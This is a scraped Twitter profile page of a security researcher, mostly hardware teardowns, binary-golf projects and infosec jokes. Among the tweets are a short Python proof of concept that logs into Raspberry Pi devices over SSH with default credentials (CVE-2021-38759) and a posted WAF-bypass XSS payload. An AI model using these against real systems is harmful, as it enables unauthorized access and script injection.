Battle Programmer Yuu @netspooky Twitter profile

Pinned Tweet

Battle Programmer Yuu

2 months

Here are the slides for my RECon 2024 talk "Binary Golfing UEFI Applications" !! Had a lot of fun, thanks for having me!

4

85

274

Last Seen Profiles

@satoru_portrait

@winbre_sakura

@ImOnDrugzz

@777_LEAGUE

@yogigade

@Predo0198

@mathGrids

@josiahcoops

@alvarxz

@Miuuu1216

@SwayMolina

@Vawraek

@lomlkorrasami

@theblerdview

@welt_woman

@Chesterfield_UK

@yokoikenji

@JC_3n1

@DAlves8083

@AishaNuge

@Coach_Rena

@dul_turkporno

@Fer_yp

@ayoung_jeon

@thundel

@tamarinnV

@taesbkg

@m_asama

@SomeOneFreeD

@xSqntyx

@aommiiao

@iro_050306

@gom_translate

@bokeplokalmalam

@minajmaxxing

@snovice

Battle Programmer Yuu

@netspooky

3 months

Have you ever wondered what's in one of those Dyson fans? Mine stopped working and I wanted to get rid of it, but I remembered it has my wifi creds and prolly customer info on the board, so it needs to be properly disposed of. Let's take it apart and see what's inside!

127

932

14K

Battle Programmer Yuu

@netspooky

3 months

$80 to smoke weed and write Python scripts?? I get paid way more to do that. Know your worth!! Don't let them lowball you!!

Lord Arse! 🕹️

@Lord_Arse

3 months

Like drugs? Enjoy programming? Boy, have I got the perfect job for you.

97

119

1K

24

602

8K

Battle Programmer Yuu

@netspooky

4 months

This is like the bong crafting of desoldering

42

734

4K

Battle Programmer Yuu

@netspooky

4 years

Watching Parler videos scraped by @donk_enby being used as evidence at the impeachment trial. The IDOR she found in Parler's API was one of the most consequential exploits in recent history.

16

327

2K

Battle Programmer Yuu

@netspooky

3 months

Also, why do I care about data on the device? If something collects data about me and it's in my control, why wouldn't I take a few minutes to disassemble it and learn about it's internals? If I could wipe the disk on their servers that had my customer data I would do that too.

22

72

2K

Battle Programmer Yuu

@netspooky

5 years

@byourseff @__device__ "try with another browser"

4

17

2K

Battle Programmer Yuu

@netspooky

4 months

Idk if we can ever beat 2020 thugcrowd in the shitposting department

ThugCrowd

@thugcrowd

4 years

Checkmate libs.

14

54

510

9

95

2K

Battle Programmer Yuu

@netspooky

2 years

10

196

2K

Battle Programmer Yuu

@netspooky

4 years

Now that he's in jail I can probably say, the highlight of my career is getting J\o\h\n M\c\A\f\e\e to sideload an APK on his trap phone while he was on the run.

22

185

2K

Battle Programmer Yuu

@netspooky

3 months

The first order of business is getting the screws off the bottom. There were screws in several locations, many under the feet. Once the bottom cover is off, you can see the gear mechanism that rotates the fan

6

15

2K

Battle Programmer Yuu

@netspooky

1 month

@MikaelThalen He fell for one of the classic blunders, thinking they can win a fight against gay furry hacktivists online.

12

50

2K

Battle Programmer Yuu

@netspooky

3 years

@prodilovechris How do you even have that many authors? Is everyone just contributing one word at a time? "Yo you heard that new 🔥🔥? Remember when they said 'the'? That was me bro!! I wrote that!"

4

14

1K

Battle Programmer Yuu

@netspooky

3 months

Also there are people in the quote tweets wondering why this fan even has wifi and stores data. This fan has an MQTT server on it that the app uses to control it. It also stores historical data about air quality, temperature, and other things. That's why I wanted to take it apart

11

16

1K

Battle Programmer Yuu

@netspooky

4 months

ok

8

80

1K

Battle Programmer Yuu

@netspooky

3 months

There are three main things in the base, a screen, a main board, and a wifi/BLE module. The main board is shiny due to resin coating.

4

10

1K

Battle Programmer Yuu

@netspooky

3 months

I realized the screws that held the other part of the base were screwed from the inside, so I took out the filter and removed the actual fan part out, revealing the electronics I'm looking for!

3

10

1K

Battle Programmer Yuu

@netspooky

2 years

'No Way To Prevent This,' Says Only CDN That Regularly Hosts Content Like This

6

263

1K

Battle Programmer Yuu

@netspooky

1 month

I Wake Up

7

135

1K

Battle Programmer Yuu

@netspooky

3 months

This is a closer pic of the wireless module. When I took this pic, my phone's camera read that barcode which said "QCA4020", which is a nice soc I've played with before. It's got WiFi, BLE, and even has 802.15.4 (hehe)

3

12

1K

Battle Programmer Yuu

@netspooky

3 months

This is the main board. It's glossed tf up with a resin coating. It's got an STM32F429 which is an ARM Cortex M4 chip. There's an unmarked chip covered in glue on the back side, which is close to where the power comes in so it's probably a power controller or something

7

1K

Battle Programmer Yuu

@netspooky

2 years

@oneunderscore__ @MattWBZ "I told my kids that dinosaurs didn't become extinct by accident, they saw the future and said "Screw this, let's go to the tarpit"" is the hardest thing I've ever heard anyone say about a grocery store closing.

5

54

1K

Battle Programmer Yuu

@netspooky

5 months

Just to be clear: RTSP - Real Time Streaming Protocol RTP - Real-time Transport Protocol SRTP - Secure Real-time Transport Protocol RSTP - Rapid Spanning Tree Protocol RTPS - Real Time Publish Subscribe protocol PSRT - Parsley, Sage, Rosemary and Thyme (Simon & Garfunkel album)

15

184

1K

Battle Programmer Yuu

@netspooky

3 years

I bought one of these today because I needed to take a test. It was the only one at CVS and it was disappointing because it required me to link with a phone to get my results. Let's see what's inside:

41

321

1K

Battle Programmer Yuu

@netspooky

4 years

22

266

1K

Battle Programmer Yuu

@netspooky

3 months

The remote was very annoying to take apart. It was glued in, so I had to carefully chip away at it with pliers. Notice the magnets on the side of the plastic, and the fact that there are 10 buttons while only 8 are used.

7

5

1K

Battle Programmer Yuu

@netspooky

3 months

I really wanted to get the fan blower apart, but after unscrewing and unclipping everything I could see, the unit seems to be snapped together in a way that I can't figure out at the moment. That's all for now, I gotta get back to work lol.

10

6

988

Battle Programmer Yuu

@netspooky

2 years

My dad visited me for the first time in nearly 5 years. I showed him my office, he sees my shelf full of computers. I pointed to one tower and said "That one is fuzzing the Linux kernel, it's looking for bugs 24/7" His response: "Ok."

19

29

953

Battle Programmer Yuu

@netspooky

5 years

@yogioabs How are there so many of these same dudes on Twitter? Do y'all have some starter pack with copypastas like a multi level marketing representative or something?

8

13

901

Battle Programmer Yuu

@netspooky

2 years

What's a handy reverse engineering trick that you think more people should know about?

81

201

942

Battle Programmer Yuu

@netspooky

3 months

Now for the long air circulator part. There is what I assume is an air quality sensor with an air intake. The rest of the unit doesn't have too much else in it. I know the top of the fan has a magnet for charging the remote, but I dont feel like disassembling.

6

4

937

Battle Programmer Yuu

@netspooky

10 months

Good news everyone, we are all keeping our jobs at the SQL injection factory

Adam Rackis

@AdamRackis

10 months

Server actions 🔥

786

309

4K

7

105

879

Battle Programmer Yuu

@netspooky

3 years

As a person in the know, it's good, actually, to gatekeep spyware from abusive partners. This is just vile.

35

95

851

Battle Programmer Yuu

@netspooky

2 years

This is one of the most in depth blog series I've ever read about networking on Linux. A bit old now but still 🔥 Everything from physical NIC registration to how data moves from userland<->kernel and beyond. Sending: Receiving:

7

197

848

Battle Programmer Yuu

@netspooky

5 years

@Crypto_Bitlord Not real. That's notpetya my dude. A lot of planes in flight systems like that use Linux. NotPetya targets Windows. Also this is the original pic.

21

72

802

Battle Programmer Yuu

@netspooky

3 years

tl;dr - You can rip the test strip out instead of giving your data to some dodgy company, and you get a BLE SoC to mess around with. Also I tested negative 🎉

12

34

794

Battle Programmer Yuu

@netspooky

1 year

Antennas will never not be funny to me. I got this satellite one that's just a little ceramic block attached to a wire. I know that so much math and engineering went into this, but the form factor is like ??? plug this bricklet into yr antenna hole and you can get data from space

11

94

773

Battle Programmer Yuu

@netspooky

3 months

For those wondering why I don't just fix it: The original issue was that the device didn't boot up. I think a firmware update got borked and bricked it. I spoke with @dnoiz1 who had the same issue. You would need to replace the main board which isn't an easy part to get.

12

8

784

Battle Programmer Yuu

@netspooky

2 months

I wish people would just post the link to stuff instead of treating everything like some ancient secret that you gotta click the Like and Subscribe button to unlock.

32

30

727

Battle Programmer Yuu

@netspooky

3 years

I remember when I was interviewing for my first tech job in early 2017. Someone asked me "What do you think the biggest cyber threat will be over the next 5 years?" I said "ransomware", and the dude argued with me about it and was oddly dismissive. I wonder how that org is doing.

17

52

682

Battle Programmer Yuu

@netspooky

3 years

My entry for #bggp2021 - 487 byte PE/PDF/JS polyglot Source:

16

118

674

Battle Programmer Yuu

@netspooky

4 years

Parler has hella vulns and leaks user data like crazy

29

79

648

Battle Programmer Yuu

@netspooky

3 years

you ever walk up to a cat and say %p%s%p%s%p%s%p%s

10

80

661

Battle Programmer Yuu

@netspooky

4 years

lmao

48

90

644

Battle Programmer Yuu

@netspooky

1 year

scare - Simple Configurable Assembly REPL && Emulator I wrote this for people who want to write/test/play with various assembly architectures on the command line. Currently supports x86, x64, arm32, arm64 with plans for more architectures and modes.

17

174

634

Battle Programmer Yuu

@netspooky

3 years

Thanks for showing me what it looks like, I will be sure to accidentally drop my entire coffee on it if I see one in public.

9

84

611

Battle Programmer Yuu

@netspooky

2 years

Bypassing DRM and evading paywalls are life skills that should be taught in school

8

111

605

Battle Programmer Yuu

@netspooky

2 years

Excited to be starting at one of the Big 5 Ransomware groups today! Thanks to everyone who supported me on this journey 🙏🙏

28

41

600

Battle Programmer Yuu

@netspooky

2 years

I was looking at some vuln code snippets for a thing I'm making and stumbled across this. At first I was like "do they mean extern? huh, are they making a symlink? wait, wut?". It didn't make any sense and I couldn't think of a reason why. Then I looked "printf external link" up.

12

111

601

Battle Programmer Yuu

@netspooky

5 years

I'm sitting on a rather large collection (~4GB) of modern malware sources. They are sorted by strain/version. Botnets, RATs, Trojans, Cred Stuffers, Rootkits, Phishing etc. Trying to figure out a sane way to make this available to researchers. If you are interested let me know.

161

106

585

Battle Programmer Yuu

@netspooky

3 years

what you're referring to as facebook is actually google plus facebook, or as i like to call it, an anti-trust violation

5

111

580

Battle Programmer Yuu

@netspooky

2 years

This is the CEO of Twitter. If you think this is cool or good in any way, we are not friends. I will not argue with you.

39

56

574

Battle Programmer Yuu

@netspooky

2 years

Is there any mobile game that isn't straight up spyware? I just looked at Tetris on Android. First off it's 136MB, which is outlandish considering I've seen Tetris that fits in a 512 byte boot sector. Second, the privacy policy outlines data it collects and stores indefinitely.

28

68

546

Battle Programmer Yuu

@netspooky

3 years

@LikeAndBlock There's no source for this at all. Blocking you so you can't hide my reply like all the others.

20

19

518

Battle Programmer Yuu

@netspooky

5 years

-At a game dev class- Instructor: So you work with computers already, what do you do? Me: I'm a reverse engineer. Instructor: So are you learning less? Me: Yes, soon I will know nothing.

9

76

548

Battle Programmer Yuu

@netspooky

1 month

Another banger from retr0id "Jailbreaking RabbitOS (The Hard Way)". It's got everything: secureboot bypasses, an Android bootkit, a tethered USB jailbreak over WebSerial, GPL violations, and highly questionable logging practices. A very fun read !!

3

173

565

Battle Programmer Yuu

@netspooky

2 years

I'm happy to finally share my writeup on weird things you can do with multicast protocols. Packets Remystified: Broadcast Brujería

14

135

512

Battle Programmer Yuu

@netspooky

6 years

PROTIP: You don't need an expensive setup to get into infosec & learning. Until last year, every machine I ever used was rescued from a dumpster. As long as you can send and receive packets, and have somewhere to edit and store files, you're good to go :)

15

106

504

Battle Programmer Yuu

@netspooky

2 years

@_nyancrimew Dan Bishop: "I'm coming for answers" The question: "Why are gay allowed in our servers when we already made it illegal for them to go to the bathroom?"

2

26

497

Battle Programmer Yuu

@netspooky

3 years

Remembering the wildest conversation I had IRL this year with a person who supposedly worked in IT and argued (among other things) that malware wasn't rly a threat anymore because computers are so fast now it doesn't matter. And you can just "get a new computer". Hope he's well.

33

23

482

Battle Programmer Yuu

@netspooky

1 year

I've been meaning to share this for a bit. Here is a wireshark/tshark dissector for the Apple BLE Advertising Beacon protocol known as "Continuity". It dissects all the data that your devices are sending out constantly. Happy Friday!

12

117

484

Battle Programmer Yuu

@netspooky

6 months

New blog! "BGGP4: A 420 Byte Self-Replicating UEFI App For x64" I cover UEFI, the UEFI x64 ABI, writing UEFI applications in x86_64 assembly, Tianocore EDK2 image loader internals, QEMU automation, and binary golf strategies for UEFI PEs. Happy Friday!

10

150

470

Battle Programmer Yuu

@netspooky

3 years

hackers will either set up something super vulnerable and fragile that was supposed to be temporary but falls into regular use, or make something so secure that they eventually cannot get back into it after forgetting about it for 6 months

7

49

462

Battle Programmer Yuu

@netspooky

3 years

PoC||GTFO 21 is out!! Check out my paper on creating a tiny palindrome 64 bit ELF, as well as all the other badass papers and hidden secrets in this PDF :)

10

156

463

Battle Programmer Yuu

@netspooky

3 years

Binary Golf Grand Prix 2021 is now live! curl -sL n0[.]lol/bggp/2021.ans

5

120

452

Battle Programmer Yuu

@netspooky

1 year

Clicked on the link in this CVE's references section and found that it's just a GitHub issue that was closed because the OP misinterpreted some files and thought it was a bug 😵‍💫

CVE

@CVEnew

1 year

CVE-2023-34585 An issue was discovered in OBS-Studio 29.1.1, plaintext storage of passwords.

3

4

17

14

72

451

Battle Programmer Yuu

@netspooky

4 months

@gf_256 Truu

3

19

457

Battle Programmer Yuu

@netspooky

3 years

I think that knowing how to read C is one of the most crucial skills for security people. You don't even have to be good at writing it. Just knowing how programs are structured, common standard library functions, and how to roughly follow the program flow, will pay dividends.

18

62

428

Battle Programmer Yuu

@netspooky

4 years

I love that MSNBC showed the faces of each senator as they voted "Not Guilty". Remember their coward ass faces.

10

71

409

Battle Programmer Yuu

@netspooky

3 years

If your man: ✅ Is overprotective ✅ Is controlling ✅ Has an extensive earth-fault protection portfolio with unique multi-frequency admittance-based protection for higher sensitivity and selectivity That's not your man, that's an ABB HBFHAEAGNBA1BNN11G

8

92

414

Battle Programmer Yuu

@netspooky

3 years

On the plus side, you do get a nice Nordic Semiconductor nRF52810 and test pads to reprogram it if you want to play around with BLE. It's got an ARM Cortex M4 and a 2.4 GHz transciever. It's a shame it's meant to be thrown away, you can have a lot of fun with this.

7

38

415

Battle Programmer Yuu

@netspooky

2 years

If I went to an interview and they gave me 30 minutes to solve a problem like this, I'd spend that 30 minutes looking for other jobs to apply to haha.

32

31

401

Battle Programmer Yuu

@netspooky

3 years

82 byte ELF64 - 2 bytes smaller than what was thought to be the smallest possible. Bypasses the kernel mitigation that made 84 byte ELF64s not work anymore. :)

6

66

403

Battle Programmer Yuu

@netspooky

4 years

Here is my write up on creating a palindromic 64 bit ELF binary for the Binary Golf Grand Prix. This 245 byte ELF binary executes the same forwards as it does backwards, and prints out the palindrome "Puppy Spy, Psy P. Pup".

5

140

398

Battle Programmer Yuu

@netspooky

2 years

RE Tips: Common String Representations Strings are a good way of determining the layout of an unknown binary blob. If you can figure out how the strings are stored, you can use it as an anchor to map out other structures around them.

4

68

399

Battle Programmer Yuu

@netspooky

2 years

dst2dst, a multicast chat protocol tunneled over any ethernet frame and bounced off the router

10

66

390

Battle Programmer Yuu

@netspooky

3 years

I found my first legit kernel bug in the latest kernel, triaged it, wrote a poc to test, showed some pals for their thoughts. Both send me blog posts about how just 3 days ago this bug was found, exploited, and patched.

21

12

388

Battle Programmer Yuu

@netspooky

2 years

Found a notebook from when I truly went insane and started to learn x86 from the bottom up

21

25

390

Battle Programmer Yuu

@netspooky

8 months

sorry can't go out i got a uart shell on my mf shoes

5

36

371

Battle Programmer Yuu

@netspooky

3 years

Me explaining CSRF, the underground cookie market, and browser exploits at the family gathering

9

46

363

Battle Programmer Yuu

@netspooky

4 years

Here is my writeup called "Modern PE Mangling". I discuss the limits of modern 64 bit Windows binaries, and launch calc.exe from a 268 byte executable.

Battle Programmer Yuu

@netspooky

4 years

Bang bang

2

45

9

135

370

Battle Programmer Yuu

@netspooky

3 years

1 K too many if u ask me

7

37

366

Battle Programmer Yuu

@netspooky

3 months

@DigiDevZak Take apart something you enjoy using and see how it works. Start small and look up everything you see. If you are used to software, think about how physical components would fit together like libraries. What need does each module address? How do they interface with each other?

1

18

370

Battle Programmer Yuu

@netspooky

2 years

Going through notes, this is a mockup for a plugin I started to write to dump kernel structures and make them look pretty. I probably won't finish it so here.

15

35

368

Battle Programmer Yuu

@netspooky

2 years

Finding kernel bugs is more lucrative than mining crypto, so if you're looking for an alternative to heating your office, def explore this route.

9

37

346

Battle Programmer Yuu

@netspooky

3 months

@metaltxt I saw this dude outside of Nakano station several times, legend with the Pulse Demon shirt

1

0

351

Battle Programmer Yuu

@netspooky

3 years

How many likes do we need to get the cool S added to Unicode? @unicode

David Buchanan

@David3141593

3 years

@netspooky Come to think of it, the cool S should totally be added to @unicode

0

35

6

60

341

Battle Programmer Yuu

@netspooky

9 months

They say my code is exceptional, on account of how many exceptions it throws

4

57

347

Battle Programmer Yuu

@netspooky

4 years

Are you taking full advantage of Python 3? Are you sure?

10

44

340

Battle Programmer Yuu

@netspooky

3 years

For every unashamedly shitty person in InfoSec, there are two people with equal or greater skill who are uncomfortable participating in this industry because of them.

11

54

332

Battle Programmer Yuu

@netspooky

2 years

Exploit writing in the future will be like: exploit, aarch64, 128 bytes, no nulls, large breasts, trending on exploit-db, encode as emojis, reverse shell, format string leak, stageless, userfaultfd handler, massive breasts, use io_uring_spawn

8

38

331

Battle Programmer Yuu

@netspooky

3 years

#POC - CVE-2021-38759 - Tested on latest import paramiko import sys h=sys.argv[1] u="pi" p="raspberry" c=paramiko.client.SSHClient() c.set_missing_host_key_policy(paramiko.AutoAddPolicy()) c.connect(h,username=u,password=p) i,o,e=c.exec_command("id") print(o\.read()) c.close()

26

72

328

Battle Programmer Yuu

@netspooky

3 years

The BGGP 2021 Polyglot File Challenge repo is here! Each entry has been scored and visually dissected. Included are the files and info on how to run them yourself!

5

104

326

Battle Programmer Yuu

@netspooky

3 years

@fsf While our primary mission is freedom for software users, we want to be clear, the FSF board unanimously condemns misogyny, racism,and other bigotry as well as defamation, intimidation, and unfair attacks on free thought and speech.

3

35

320

Battle Programmer Yuu

@netspooky

4 years

I wrote a small script to do some basic differential analysis on network protocols. It's helped me understand some unknown protocols, so I figured I'd share. It's built for analyzing TCP/UDP based protocols, but it uses scapy, so there's room to grow!

5

91

321

Battle Programmer Yuu

@netspooky

2 years

@corg_e "My boss needs it"

0

1

316

Battle Programmer Yuu

@netspooky

3 years

Microsoft in talks to acquire popular malware hosting platform Discord for over $10B

12

51

318

Battle Programmer Yuu

@netspooky

2 years

After some digging I found this: If you mouse over printf here, it says "external link". This means someone somewhere copy/pasted this code incorrectly and it was passed along through various blogs and trainings for years. Cool?

6

22

316

Battle Programmer Yuu

@netspooky

4 years

#Cloudflare #WAFbypass Just got a $1000 payout 💵📥 <uu src=@'@' onbigclick=import('//0a" "0a0a?0a/')>mou%09se<|/uu>:} #BugBountyTips #bugbountytip #redteam #waf #obfuscation #security #linux #togetherwehitharder #hackerone #BugBounty

6

106

314

Battle Programmer Yuu

@netspooky

2 years

PoC for full duplex null frame reverse shell. It communicates over multicast and uses just one byte in the eth.dst field for channel negotiation. The rest of the bytes are just \x00. The lag is due to some socket timeout drama. Writeup on this + other multicast fun soon.

11

64

309

Battle Programmer Yuu

@netspooky

2 years

It's incredibly how quickly everyone can figure out how to completely derail and defeat an AI.

4

45

307